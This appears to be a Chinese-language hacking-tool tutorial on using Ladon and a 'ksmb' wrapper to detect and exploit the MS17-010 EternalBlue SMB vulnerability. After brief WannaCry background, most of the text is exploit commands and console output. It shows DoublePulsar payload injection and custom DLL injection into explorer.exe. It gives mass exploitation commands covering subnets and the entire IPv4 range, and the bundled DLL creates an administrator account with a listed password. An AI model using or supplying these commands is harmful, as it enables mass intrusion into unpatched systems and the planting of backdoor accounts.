永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
无损检测,不会对目标造成任何危害,大家无需担心
Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010
检测发现存在漏洞高亮显示
只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网
PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege
IP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
ksmb 192.168.1.89
ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦
ksmb 192.168.1.89 445 mydll.dll
ksmb 192.168.1.89 445 mydll.dll explorer.exe
使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。
C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0 ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804 CurrentProcess: Ladon
Call DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89 00-0C-29-CF-FE-E1 VMware
MS17010-EXP ETERNALBLUE by K8gege
IP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe
Ladon 0.0.0.0-255.255.255.255 ksmb.exe
自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#
可替换DLL,执行自定义功能
EXP小密圈内下载